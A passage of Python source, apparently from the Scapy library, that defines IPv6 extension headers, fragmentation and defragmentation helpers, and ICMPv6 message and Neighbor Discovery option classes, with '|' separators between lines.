adjust = lambda pkt,x: (x+2+7)//8 - 1),
|
_PhantomAutoPadField("autopad", 1), # autopad activated by default
|
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
|
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
|
overload_fields = {IPv6: { "nh": 60 }}
|
|
|
############################# Routing Header ################################
|
|
class IPv6ExtHdrRouting(_IPv6ExtHdr):
|
name = "IPv6 Option Header Routing"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
FieldLenField("len", None, count_of="addresses", fmt="B",
|
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
|
ByteField("type", 0),
|
ByteField("segleft", None),
|
BitField("reserved", 0, 32), # There is meaning in this field ...
|
IP6ListField("addresses", [],
|
length_from = lambda pkt: 8*pkt.len)]
|
overload_fields = {IPv6: { "nh": 43 }}
|
|
def post_build(self, pkt, pay):
|
if self.segleft is None:
|
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
|
return _IPv6ExtHdr.post_build(self, pkt, pay)
|
|
|
######################### Segment Routing Header ############################
|
|
# This implementation is based on draft 06, available at:
|
# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
|
|
class IPv6ExtHdrSegmentRoutingTLV(Packet):
|
name = "IPv6 Option Header Segment Routing - Generic TLV"
|
fields_desc = [ ByteField("type", 0),
|
ByteField("len", 0),
|
ByteField("reserved", 0),
|
ByteField("flags", 0),
|
StrLenField("value", "", length_from=lambda pkt: pkt.len) ]
|
|
def extract_padding(self, p):
|
return b"",p
|
|
registered_sr_tlv = {}
|
@classmethod
|
def register_variant(cls):
|
cls.registered_sr_tlv[cls.type.default] = cls
|
|
@classmethod
|
def dispatch_hook(cls, pkt=None, *args, **kargs):
|
if pkt:
|
tmp_type = orb(pkt[0])
|
return cls.registered_sr_tlv.get(tmp_type, cls)
|
return cls
|
|
|
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
|
name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
|
fields_desc = [ ByteField("type", 1),
|
ByteField("len", 18),
|
ByteField("reserved", 0),
|
ByteField("flags", 0),
|
IP6Field("ingress_node", "::1") ]
|
|
|
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
|
name = "IPv6 Option Header Segment Routing - Egress Node TLV"
|
fields_desc = [ ByteField("type", 2),
|
ByteField("len", 18),
|
ByteField("reserved", 0),
|
ByteField("flags", 0),
|
IP6Field("egress_node", "::1") ]
|
|
|
class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV):
|
name = "IPv6 Option Header Segment Routing - Padding TLV"
|
fields_desc = [ ByteField("type", 4),
|
FieldLenField("len", None, length_of="padding", fmt="B"),
|
StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len) ]
|
|
|
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
|
name = "IPv6 Option Header Segment Routing"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
ByteField("len", None),
|
ByteField("type", 4),
|
ByteField("segleft", None),
|
ByteField("lastentry", None),
|
BitField("unused1", 0, 1),
|
BitField("protected", 0, 1),
|
BitField("oam", 0, 1),
|
BitField("alert", 0, 1),
|
BitField("hmac", 0, 1),
|
BitField("unused2", 0, 3),
|
ShortField("tag", 0),
|
IP6ListField("addresses", ["::1"],
|
count_from=lambda pkt: pkt.lastentry),
|
PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV,
|
length_from=lambda pkt: 8*pkt.len - 16*pkt.lastentry) ]
|
|
overload_fields = { IPv6: { "nh": 43 } }
|
|
def post_build(self, pkt, pay):
|
|
if self.len is None:
|
|
# The extension must be align on 8 bytes
|
tmp_mod = (len(pkt) - 8) % 8
|
if tmp_mod == 1:
|
warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte !")
|
elif tmp_mod >= 2:
|
#Add the padding extension
|
tmp_pad = b"\x00" * (tmp_mod-2)
|
tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad)
|
pkt += raw(tlv)
|
|
tmp_len = (len(pkt) - 8) // 8
|
pkt = pkt[:1] + struct.pack("B", tmp_len)+ pkt[2:]
|
|
if self.segleft is None:
|
tmp_len = len(self.addresses)
|
if tmp_len:
|
tmp_len -= 1
|
pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
|
|
if self.lastentry is None:
|
pkt = pkt[:4] + struct.pack("B", len(self.addresses)) + pkt[5:]
|
|
return _IPv6ExtHdr.post_build(self, pkt, pay)
|
|
|
########################### Fragmentation Header ############################
|
|
class IPv6ExtHdrFragment(_IPv6ExtHdr):
|
name = "IPv6 Extension Header - Fragmentation header"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
BitField("res1", 0, 8),
|
BitField("offset", 0, 13),
|
BitField("res2", 0, 2),
|
BitField("m", 0, 1),
|
IntField("id", None) ]
|
overload_fields = {IPv6: { "nh": 44 }}
|
|
|
def defragment6(packets):
|
"""
|
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
|
Crap is dropped. What lacks is completed by 'X' characters.
|
"""
|
|
l = [x for x in packets if IPv6ExtHdrFragment in x] # remove non fragments
|
if not l:
|
return []
|
|
id = l[0][IPv6ExtHdrFragment].id
|
|
llen = len(l)
|
l = [x for x in l if x[IPv6ExtHdrFragment].id == id]
|
if len(l) != llen:
|
warning("defragment6: some fragmented packets have been removed from list")
|
llen = len(l)
|
|
# reorder fragments
|
res = []
|
while l:
|
min_pos = 0
|
min_offset = l[0][IPv6ExtHdrFragment].offset
|
for p in l:
|
cur_offset = p[IPv6ExtHdrFragment].offset
|
if cur_offset < min_offset:
|
min_pos = 0
|
min_offset = cur_offset
|
res.append(l[min_pos])
|
del(l[min_pos])
|
|
# regenerate the fragmentable part
|
fragmentable = b""
|
for p in res:
|
q=p[IPv6ExtHdrFragment]
|
offset = 8*q.offset
|
if offset != len(fragmentable):
|
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
|
fragmentable += b"X"*(offset - len(fragmentable))
|
fragmentable += raw(q.payload)
|
|
# Regenerate the unfragmentable part.
|
q = res[0]
|
nh = q[IPv6ExtHdrFragment].nh
|
q[IPv6ExtHdrFragment].underlayer.nh = nh
|
del q[IPv6ExtHdrFragment].underlayer.payload
|
q /= conf.raw_layer(load=fragmentable)
|
|
return IPv6(raw(q))
|
|
|
def fragment6(pkt, fragSize):
|
"""
|
Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
|
contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
|
maximum size of fragments (MTU). The list of packets is returned.
|
|
If packet does not contain an IPv6ExtHdrFragment class, it is returned in
|
result list.
|
"""
|
|
pkt = pkt.copy()
|
|
if not IPv6ExtHdrFragment in pkt:
|
# TODO : automatically add a fragment before upper Layer
|
# at the moment, we do nothing and return initial packet
|
# as single element of a list
|
return [pkt]
|
|
# If the payload is bigger than 65535, a Jumbo payload must be used, as
|
# an IPv6 packet can't be bigger than 65535 bytes.
|
if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
|
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
|
return []
|
|
s = raw(pkt) # for instantiation to get upper layer checksum right
|
|
if len(s) <= fragSize:
|
return [pkt]
|
|
# Fragmentable part : fake IPv6 for Fragmentable part length computation
|
fragPart = pkt[IPv6ExtHdrFragment].payload
|
tmp = raw(IPv6(src="::1", dst="::1")/fragPart)
|
fragPartLen = len(tmp) - 40 # basic IPv6 header length
|
fragPartStr = s[-fragPartLen:]
|
|
# Grab Next Header for use in Fragment Header
|
nh = pkt[IPv6ExtHdrFragment].nh
|
|
# Keep fragment header
|
fragHeader = pkt[IPv6ExtHdrFragment]
|
del fragHeader.payload # detach payload
|
|
# Unfragmentable Part
|
unfragPartLen = len(s) - fragPartLen - 8
|
unfragPart = pkt
|
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
|
|
# Cut the fragmentable part to fit fragSize. Inner fragments have
|
# a length that is an integer multiple of 8 octets. last Frag MTU
|
# can be anything below MTU
|
lastFragSize = fragSize - unfragPartLen - 8
|
innerFragSize = lastFragSize - (lastFragSize % 8)
|
|
if lastFragSize <= 0 or innerFragSize == 0:
|
warning("Provided fragment size value is too low. " +
|
"Should be more than %d" % (unfragPartLen + 8))
|
return [unfragPart/fragHeader/fragPart]
|
|
remain = fragPartStr
|
res = []
|
fragOffset = 0 # offset, incremeted during creation
|
fragId = random.randint(0,0xffffffff) # random id ...
|
if fragHeader.id is not None: # ... except id provided by user
|
fragId = fragHeader.id
|
fragHeader.m = 1
|
fragHeader.id = fragId
|
fragHeader.nh = nh
|
|
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
|
while True:
|
if (len(remain) > lastFragSize):
|
tmp = remain[:innerFragSize]
|
remain = remain[innerFragSize:]
|
fragHeader.offset = fragOffset # update offset
|
fragOffset += (innerFragSize // 8) # compute new one
|
if IPv6 in unfragPart:
|
unfragPart[IPv6].plen = None
|
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
|
res.append(tempo)
|
else:
|
fragHeader.offset = fragOffset # update offSet
|
fragHeader.m = 0
|
if IPv6 in unfragPart:
|
unfragPart[IPv6].plen = None
|
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
|
res.append(tempo)
|
break
|
return res
|
|
|
############################### AH Header ###################################
|
|
# class _AHFieldLenField(FieldLenField):
|
# def getfield(self, pkt, s):
|
# l = getattr(pkt, self.fld)
|
# l = (l*8)-self.shift
|
# i = self.m2i(pkt, s[:l])
|
# return s[l:],i
|
|
# class _AHICVStrLenField(StrLenField):
|
# def i2len(self, pkt, x):
|
|
|
|
# class IPv6ExtHdrAH(_IPv6ExtHdr):
|
# name = "IPv6 Extension Header - AH"
|
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
# _AHFieldLenField("len", None, "icv"),
|
# ShortField("res", 0),
|
# IntField("spi", 0),
|
# IntField("sn", 0),
|
# _AHICVStrLenField("icv", None, "len", shift=2) ]
|
# overload_fields = {IPv6: { "nh": 51 }}
|
|
# def post_build(self, pkt, pay):
|
# if self.len is None:
|
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
|
# if self.segleft is None:
|
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
|
# return _IPv6ExtHdr.post_build(self, pkt, pay)
|
|
|
############################### ESP Header ##################################
|
|
# class IPv6ExtHdrESP(_IPv6extHdr):
|
# name = "IPv6 Extension Header - ESP"
|
# fields_desc = [ IntField("spi", 0),
|
# IntField("sn", 0),
|
# # there is things to extract from IKE work
|
# ]
|
# overloads_fields = {IPv6: { "nh": 50 }}
|
|
|
|
#############################################################################
|
#############################################################################
|
### ICMPv6* Classes ###
|
#############################################################################
|
#############################################################################
|
|
icmp6typescls = { 1: "ICMPv6DestUnreach",
|
2: "ICMPv6PacketTooBig",
|
3: "ICMPv6TimeExceeded",
|
4: "ICMPv6ParamProblem",
|
128: "ICMPv6EchoRequest",
|
129: "ICMPv6EchoReply",
|
130: "ICMPv6MLQuery",
|
131: "ICMPv6MLReport",
|
132: "ICMPv6MLDone",
|
133: "ICMPv6ND_RS",
|
134: "ICMPv6ND_RA",
|
135: "ICMPv6ND_NS",
|
136: "ICMPv6ND_NA",
|
137: "ICMPv6ND_Redirect",
|
#138: Do Me - RFC 2894 - Seems painful
|
139: "ICMPv6NIQuery",
|
140: "ICMPv6NIReply",
|
141: "ICMPv6ND_INDSol",
|
142: "ICMPv6ND_INDAdv",
|
#143: Do Me - RFC 3810
|
144: "ICMPv6HAADRequest",
|
145: "ICMPv6HAADReply",
|
146: "ICMPv6MPSol",
|
147: "ICMPv6MPAdv",
|
#148: Do Me - SEND related - RFC 3971
|
#149: Do Me - SEND related - RFC 3971
|
151: "ICMPv6MRD_Advertisement",
|
152: "ICMPv6MRD_Solicitation",
|
153: "ICMPv6MRD_Termination",
|
}
|
|
icmp6typesminhdrlen = { 1: 8,
|
2: 8,
|
3: 8,
|
4: 8,
|
128: 8,
|
129: 8,
|
130: 24,
|
131: 24,
|
132: 24,
|
133: 8,
|
134: 16,
|
135: 24,
|
136: 24,
|
137: 40,
|
#139:
|
#140
|
141: 8,
|
142: 8,
|
144: 8,
|
145: 8,
|
146: 8,
|
147: 8,
|
151: 8,
|
152: 4,
|
153: 4
|
}
|
|
icmp6types = { 1 : "Destination unreachable",
|
2 : "Packet too big",
|
3 : "Time exceeded",
|
4 : "Parameter problem",
|
100 : "Private Experimentation",
|
101 : "Private Experimentation",
|
128 : "Echo Request",
|
129 : "Echo Reply",
|
130 : "MLD Query",
|
131 : "MLD Report",
|
132 : "MLD Done",
|
133 : "Router Solicitation",
|
134 : "Router Advertisement",
|
135 : "Neighbor Solicitation",
|
136 : "Neighbor Advertisement",
|
137 : "Redirect Message",
|
138 : "Router Renumbering",
|
139 : "ICMP Node Information Query",
|
140 : "ICMP Node Information Response",
|
141 : "Inverse Neighbor Discovery Solicitation Message",
|
142 : "Inverse Neighbor Discovery Advertisement Message",
|
143 : "Version 2 Multicast Listener Report",
|
144 : "Home Agent Address Discovery Request Message",
|
145 : "Home Agent Address Discovery Reply Message",
|
146 : "Mobile Prefix Solicitation",
|
147 : "Mobile Prefix Advertisement",
|
148 : "Certification Path Solicitation",
|
149 : "Certification Path Advertisement",
|
151 : "Multicast Router Advertisement",
|
152 : "Multicast Router Solicitation",
|
153 : "Multicast Router Termination",
|
200 : "Private Experimentation",
|
201 : "Private Experimentation" }
|
|
|
class _ICMPv6(Packet):
|
name = "ICMPv6 dummy class"
|
overload_fields = {IPv6: {"nh": 58}}
|
def post_build(self, p, pay):
|
p += pay
|
if self.cksum == None:
|
chksum = in6_chksum(58, self.underlayer, p)
|
p = p[:2]+struct.pack("!H", chksum)+p[4:]
|
return p
|
|
def hashret(self):
|
return self.payload.hashret()
|
|
def answers(self, other):
|
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
|
if (isinstance(self.underlayer, IPerror6) or
|
isinstance(self.underlayer, _IPv6ExtHdr) and
|
isinstance(other, _ICMPv6)):
|
if not ((self.type == other.type) and
|
(self.code == other.code)):
|
return 0
|
return 1
|
return 0
|
|
|
class _ICMPv6Error(_ICMPv6):
|
name = "ICMPv6 errors dummy class"
|
def guess_payload_class(self,p):
|
return IPerror6
|
|
class ICMPv6Unknown(_ICMPv6):
|
name = "Scapy6 ICMPv6 fallback class"
|
fields_desc = [ ByteEnumField("type",1, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum", None),
|
StrField("msgbody", "")]
|
|
|
################################## RFC 2460 #################################
|
|
class ICMPv6DestUnreach(_ICMPv6Error):
|
name = "ICMPv6 Destination Unreachable"
|
fields_desc = [ ByteEnumField("type",1, icmp6types),
|
ByteEnumField("code",0, { 0: "No route to destination",
|
1: "Communication with destination administratively prohibited",
|
2: "Beyond scope of source address",
|
3: "Address unreachable",
|
4: "Port unreachable" }),
|
XShortField("cksum", None),
|
ByteField("length", 0),
|
X3BytesField("unused",0)]
|
|
class ICMPv6PacketTooBig(_ICMPv6Error):
|
name = "ICMPv6 Packet Too Big"
|
fields_desc = [ ByteEnumField("type",2, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum", None),
|
IntField("mtu",1280)]
|
|
class ICMPv6TimeExceeded(_ICMPv6Error):
|
name = "ICMPv6 Time Exceeded"
|
fields_desc = [ ByteEnumField("type",3, icmp6types),
|
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
|
1: "fragment reassembly time exceeded"}),
|
XShortField("cksum", None),
|
ByteField("length", 0),
|
X3BytesField("unused",0)]
|
|
# The default pointer value is set to the next header field of
|
# the encapsulated IPv6 packet
|
class ICMPv6ParamProblem(_ICMPv6Error):
|
name = "ICMPv6 Parameter Problem"
|
fields_desc = [ ByteEnumField("type",4, icmp6types),
|
ByteEnumField("code",0, {0: "erroneous header field encountered",
|
1: "unrecognized Next Header type encountered",
|
2: "unrecognized IPv6 option encountered"}),
|
XShortField("cksum", None),
|
IntField("ptr",6)]
|
|
class ICMPv6EchoRequest(_ICMPv6):
|
name = "ICMPv6 Echo Request"
|
fields_desc = [ ByteEnumField("type", 128, icmp6types),
|
ByteField("code", 0),
|
XShortField("cksum", None),
|
XShortField("id",0),
|
XShortField("seq",0),
|
StrField("data", "")]
|
def mysummary(self):
|
return self.sprintf("%name% (id: %id% seq: %seq%)")
|
def hashret(self):
|
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
|
|
|
class ICMPv6EchoReply(ICMPv6EchoRequest):
|
name = "ICMPv6 Echo Reply"
|
type = 129
|
def answers(self, other):
|
# We could match data content between request and reply.
|
return (isinstance(other, ICMPv6EchoRequest) and
|
self.id == other.id and self.seq == other.seq and
|
self.data == other.data)
|
|
|
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
|
|
# tous les messages MLD sont emis avec une adresse source lien-locale
|
# -> Y veiller dans le post_build si aucune n'est specifiee
|
# La valeur de Hop-Limit doit etre de 1
|
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
|
# header. (The router alert option is necessary to cause routers to
|
# examine MLD messages sent to multicast addresses in which the router
|
# itself has no interest"
|
class _ICMPv6ML(_ICMPv6):
|
fields_desc = [ ByteEnumField("type", 130, icmp6types),
|
ByteField("code", 0),
|
XShortField("cksum", None),
|
ShortField("mrd", 0),
|
ShortField("reserved", 0),
|
IP6Field("mladdr","::")]
|
|
# general queries are sent to the link-scope all-nodes multicast
|
# address ff02::1, with a multicast address field of 0 and a MRD of
|
# [Query Response Interval]
|
# Default value for mladdr is set to 0 for a General Query, and
|
# overloaded by the user for a Multicast Address specific query
|
# TODO : See what we can do to automatically include a Router Alert
|
# Option in a Destination Option Header.
|
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
|
name = "MLD - Multicast Listener Query"
|
type = 130
|
mrd = 10000 # 10s for mrd
|
mladdr = "::"
|
overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
|
def hashret(self):
|
if self.mladdr != "::":
|
return (
|
inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret()
|
)
|
else:
|
return self.payload.hashret()
|
|
|
# TODO : See what we can do to automatically include a Router Alert
|
# Option in a Destination Option Header.
|
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
|
name = "MLD - Multicast Listener Report"
|
type = 131
|
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
|
# implementer le hashret et le answers
|
|
# When a node ceases to listen to a multicast address on an interface,
|
# it SHOULD send a single Done message to the link-scope all-routers
|
# multicast address (FF02::2), carrying in its multicast address field
|
# the address to which it is ceasing to listen
|
# TODO : See what we can do to automatically include a Router Alert
|
# Option in a Destination Option Header.
|
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
|
name = "MLD - Multicast Listener Done"
|
type = 132
|
overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}
|
|
|
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
|
|
# TODO:
|
# - 04/09/06 troglocan : find a way to automatically add a router alert
|
# option for all MRD packets. This could be done in a specific
|
# way when IPv6 is the under layer with some specific keyword
|
# like 'exthdr'. This would allow to keep compatibility with
|
# providing IPv6 fields to be overloaded in fields_desc.
|
#
|
# At the moment, if user inserts an IPv6 Router alert option
|
# none of the IPv6 default values of IPv6 layer will be set.
|
|
class ICMPv6MRD_Advertisement(_ICMPv6):
|
name = "ICMPv6 Multicast Router Discovery Advertisement"
|
fields_desc = [ByteEnumField("type", 151, icmp6types),
|
ByteField("advinter", 20),
|
XShortField("cksum", None),
|
ShortField("queryint", 0),
|
ShortField("robustness", 0)]
|
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
|
# IPv6 Router Alert requires manual inclusion
|
def extract_padding(self, s):
|
return s[:8], s[8:]
|
|
class ICMPv6MRD_Solicitation(_ICMPv6):
|
name = "ICMPv6 Multicast Router Discovery Solicitation"
|
fields_desc = [ByteEnumField("type", 152, icmp6types),
|
ByteField("res", 0),
|
XShortField("cksum", None) ]
|
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
|
# IPv6 Router Alert requires manual inclusion
|
def extract_padding(self, s):
|
return s[:4], s[4:]
|
|
class ICMPv6MRD_Termination(_ICMPv6):
|
name = "ICMPv6 Multicast Router Discovery Termination"
|
fields_desc = [ByteEnumField("type", 153, icmp6types),
|
ByteField("res", 0),
|
XShortField("cksum", None) ]
|
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}}
|
# IPv6 Router Alert requires manual inclusion
|
def extract_padding(self, s):
|
return s[:4], s[4:]
|
|
|
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
|
|
icmp6ndopts = { 1: "Source Link-Layer Address",
|
2: "Target Link-Layer Address",
|
3: "Prefix Information",
|
4: "Redirected Header",
|
5: "MTU",
|
6: "NBMA Shortcut Limit Option", # RFC2491
|
7: "Advertisement Interval Option",
|
8: "Home Agent Information Option",
|
9: "Source Address List",
|
10: "Target Address List",
|
11: "CGA Option", # RFC 3971
|
12: "RSA Signature Option", # RFC 3971
|
13: "Timestamp Option", # RFC 3971
|
14: "Nonce option", # RFC 3971
|
15: "Trust Anchor Option", # RFC 3971
|
16: "Certificate Option", # RFC 3971
|
17: "IP Address Option", # RFC 4068
|
18: "New Router Prefix Information Option", # RFC 4068
|
19: "Link-layer Address Option", # RFC 4068
|
20: "Neighbor Advertisement Acknowledgement Option",
|
21: "CARD Request Option", # RFC 4065/4066/4067
|
22: "CARD Reply Option", # RFC 4065/4066/4067
|
23: "MAP Option", # RFC 4140
|
24: "Route Information Option", # RFC 4191
|
25: "Recusive DNS Server Option",
|
26: "IPv6 Router Advertisement Flags Option"
|
}
|
|
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
|
2: "ICMPv6NDOptDstLLAddr",
|
3: "ICMPv6NDOptPrefixInfo",
|
4: "ICMPv6NDOptRedirectedHdr",
|
5: "ICMPv6NDOptMTU",
|
6: "ICMPv6NDOptShortcutLimit",
|
7: "ICMPv6NDOptAdvInterval",
|
8: "ICMPv6NDOptHAInfo",
|
9: "ICMPv6NDOptSrcAddrList",
|
10: "ICMPv6NDOptTgtAddrList",
|
#11: Do Me,
|
#12: Do Me,
|
#13: Do Me,
|
#14: Do Me,
|
#15: Do Me,
|
#16: Do Me,
|
17: "ICMPv6NDOptIPAddr",
|
18: "ICMPv6NDOptNewRtrPrefix",
|
19: "ICMPv6NDOptLLA",
|
#18: Do Me,
|
#19: Do Me,
|
#20: Do Me,
|
#21: Do Me,
|
#22: Do Me,
|
23: "ICMPv6NDOptMAP",
|
24: "ICMPv6NDOptRouteInfo",
|
25: "ICMPv6NDOptRDNSS",
|
26: "ICMPv6NDOptEFA",
|
31: "ICMPv6NDOptDNSSL"
|
}
|
|
class _ICMPv6NDGuessPayload:
|
name = "Dummy ND class that implements guess_payload_class()"
|
def guess_payload_class(self,p):
|
if len(p) > 1:
|
return get_cls(icmp6ndoptscls.get(orb(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
|
|
|
# Beginning of ICMPv6 Neighbor Discovery Options.
|
|
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
|
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
|
fields_desc = [ ByteField("type",None),
|
FieldLenField("len",None,length_of="data",fmt="B",
|
adjust = lambda pkt,x: x+2),
|
StrLenField("data","",
|
length_from = lambda pkt: pkt.len-2) ]
|
|
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
|
# TODO: Revoir le coup du ETHER_ANY
|
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
|
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
|
fields_desc = [ ByteField("type", 1),
|
ByteField("len", 1),
|
MACField("lladdr", ETHER_ANY) ]
|
def mysummary(self):
|
return self.sprintf("%name% %lladdr%")
|
|
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
|
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
|
type = 2
|
|
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
|
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
|
fields_desc = [ ByteField("type",3),
|
ByteField("len",4),
|
ByteField("prefixlen",None),
|
BitField("L",1,1),
|
BitField("A",1,1),
|
BitField("R",0,1),
|
BitField("res1",0,5),
|
XIntField("validlifetime",0xffffffff),
|
XIntField("preferredlifetime",0xffffffff),
|
XIntField("res2",0x00000000),
|
IP6Field("prefix","::") ]
|
def mysummary(self):
|
return self.sprintf("%name% %prefix%")
|
|
# TODO: We should also limit the size of included packet to something
|
# like (initiallen - 40 - 2)
|
class TruncPktLenField(PacketLenField):
|
__slots__ = ["cur_shift"]
|
|
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
|
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
|
self.cur_shift = cur_shift
|
|
def getfield(self, pkt, s):
|
l = self.length_from(pkt)
|
i = self.m2i(pkt, s[:l])
|
return s[l:],i
|
|
def m2i(self, pkt, m):
|
s = None
|
try: # It can happen we have sth shorter than 40 bytes
|
s = self.cls(m)
|
except:
|
return conf.raw_layer(m)
|
return s
|
|
def i2m(self, pkt, x):
|
s = raw(x)
|
l = len(s)
|
r = (l + self.cur_shift) % 8
|
l = l - r
|
return s[:l]
|
|
def i2len(self, pkt, i):
|
return len(self.i2m(pkt, i))
|
|
|
# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
|
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
|
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
|
fields_desc = [ ByteField("type",4),
|
FieldLenField("len", None, length_of="pkt", fmt="B",
|
adjust = lambda pkt,x:(x+8)//8),
|
StrFixedLenField("res", b"\x00"*6, 6),
|
TruncPktLenField("pkt", b"", IPv6, 8,
|
length_from = lambda pkt: 8*pkt.len-8) ]
|
|
# See which value should be used for default MTU instead of 1280
|
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
|
name = "ICMPv6 Neighbor Discovery Option - MTU"
|
fields_desc = [ ByteField("type",5),
|
ByteField("len",1),
|
XShortField("res",0),
|
IntField("mtu",1280)]
|
|
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
|
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
|
fields_desc = [ ByteField("type", 6),
|
ByteField("len", 1),
|
ByteField("shortcutlim", 40), # XXX
|
ByteField("res1", 0),
|
IntField("res2", 0) ]
|
|
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
|
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
|
fields_desc = [ ByteField("type",7),
|
ByteField("len",1),
|
ShortField("res", 0),
|
IntField("advint", 0) ]
|
def mysummary(self):
|
return self.sprintf("%name% %advint% milliseconds")
|
|
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
|
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
|
fields_desc = [ ByteField("type",8),
|
ByteField("len",1),
|
ShortField("res", 0),
|
ShortField("pref", 0),
|
ShortField("lifetime", 1)]
|
def mysummary(self):
|
return self.sprintf("%name% %pref% %lifetime% seconds")
|
|
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
|
|
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
|
|
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
|
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
|
fields_desc = [ ByteField("type",17),
|
ByteField("len", 3),
|
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
|
2: "New Care-Of Address",
|
3: "NAR's IP address" }),
|
ByteField("plen", 64),
|
IntField("res", 0),
|
IP6Field("addr", "::") ]
|
|
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
|
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
|
fields_desc = [ ByteField("type",18),
|
ByteField("len", 3),
|
ByteField("optcode", 0),
|
ByteField("plen", 64),
|
IntField("res", 0),
|
IP6Field("prefix", "::") ]
|
|
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
|
1: "LLA for the new AP",
|
2: "LLA of the MN",
|
3: "LLA of the NAR",
|
4: "LLA of the src of TrSolPr or PrRtAdv msg",
|
5: "AP identified by LLA belongs to current iface of router",
|
6: "No preifx info available for AP identified by the LLA",
|
7: "No fast handovers support for AP identified by the LLA" }
|
|
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
|
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
|
fields_desc = [ ByteField("type", 19),
|
ByteField("len", 1),
|
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
|
MACField("lla", ETHER_ANY) ] # We only support ethernet
|
|
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
|
name = "ICMPv6 Neighbor Discovery - MAP Option"
|
fields_desc = [ ByteField("type", 23),
|
ByteField("len", 3),
|
BitField("dist", 1, 4),
|
BitField("pref", 15, 4), # highest availability
|
